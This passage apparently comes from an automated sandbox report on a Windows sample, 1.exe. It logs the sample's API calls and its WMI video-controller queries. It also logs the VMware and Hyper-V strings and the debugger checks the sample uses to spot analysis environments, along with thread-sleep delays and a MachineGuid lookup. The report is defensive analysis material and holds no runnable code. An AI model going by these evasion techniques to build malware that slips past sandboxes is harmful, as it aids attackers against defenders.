Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00CC7225 push ecx; ret	0_2_00CC7238
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_061E7550 push es; ret	0_2_061E7560
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_061E6B88 pushad ; ret	0_2_061E6B89

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C44633 IsIconic,PostMessageA,	0_2_00C44633
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00BF0783 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageA,UpdateWindow,SendMessageA,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	0_2_00BF0783
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C42754 IsWindow,GetFocus,IsChild,SendMessageA,IsChild,SendMessageA,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,	0_2_00C42754
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C008A5 IsWindowVisible,IsIconic,	0_2_00C008A5
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C1AC46 GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,	0_2_00C1AC46
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C04EC7 SetForegroundWindow,IsIconic,	0_2_00C04EC7
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C04F6B IsIconic,	0_2_00C04F6B
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C431E3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_00C431E3
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C431E3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_00C431E3
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C431E3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_00C431E3
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C434E3 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,	0_2_00C434E3
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00C43A6E IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageA,PtInRect,SendMessageA,ScreenToClient,PtInRect,GetParent,SendMessageA,GetFocus,WindowFromPoint,SendMessageA,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageA,	0_2_00C43A6E

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00BE7585 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyA,lstrcpyA,EnumFontFamiliesA,EnumFontFamiliesA,lstrcpyA,EnumFontFamiliesA,lstrcpyA,CreateFontIndirectA,CreateFontIndirectA,CreateFontIndirectA,CreateFontIndirectA,CreateFontIndirectA,CreateFontIndirectA,GetSystemMetrics,lstrcpyA,CreateFontIndirectA,GetStockObject,GetStockObject,GetObjectA,GetObjectA,lstrcpyA,CreateFontIndirectA,CreateFontIndirectA,GetStockObject,GetObjectA,CreateFontIndirectA,CreateFontIndirectA,__EH_prolog3_GS,GetVersionExA,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00BE7585

Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\1.exe	Memory allocated: 36B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Memory allocated: 4060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Memory allocated: 36B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Window / User API: threadDelayed 507			Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Window / User API: threadDelayed 9315			Jump to behavior

Source: C:\Users\user\Desktop\1.exe

API coverage: 3.7 %

Source: C:\Users\user\Desktop\1.exe TID: 8000	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1.exe TID: 8000	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1.exe TID: 8012	Thread sleep count: 507 > 30	Jump to behavior
Source: C:\Users\user\Desktop\1.exe TID: 8012	Thread sleep count: 9315 > 30	Jump to behavior

Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00BD1100 GetEnvironmentVariableA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_wprintf,		0_2_00BD1100
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00BFE17D __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_strcpy_s,		0_2_00BFE17D

Source: C:\Users\user\Desktop\1.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: 1.exe, 00000000.00000002.3120059123.0000000001355000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWFFu
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 1.exe, 00000000.00000002.3120059123.000000000133C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3120059123.0000000001355000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\1.exe

API call chain: ExitProcess graph end node

graph_0-62460

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\1.exe

0_2_00BD15B0

Source: C:\Users\user\Desktop\1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00CCCBBD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CCCBBD

Source: C:\Users\user\Desktop\1.exe

0_2_00CD8529

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_035D1628 mov eax, dword ptr fs:[00000030h]

0_2_035D1628

Source: C:\Users\user\Desktop\1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00CCCBBD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00CCCBBD
Source: C:\Users\user\Desktop\1.exe	Code function: 0_2_00CC5A7F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00CC5A7F

Source: C:\Users\user\Desktop\1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,

0_2_00BD3B3A

Source: C:\Users\user\Desktop\1.exe

Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00CC65DA GetSystemTimeAsFileTime,__aulldiv,

0_2_00CC65DA

Source: C:\Users\user\Desktop\1.exe

Code function: 0_2_00CD3AFD __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_00CD3AFD

Source: C:\Users\user\Desktop\1.exe

0_2_00BE7585

Source: C:\Users\user\Desktop\1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
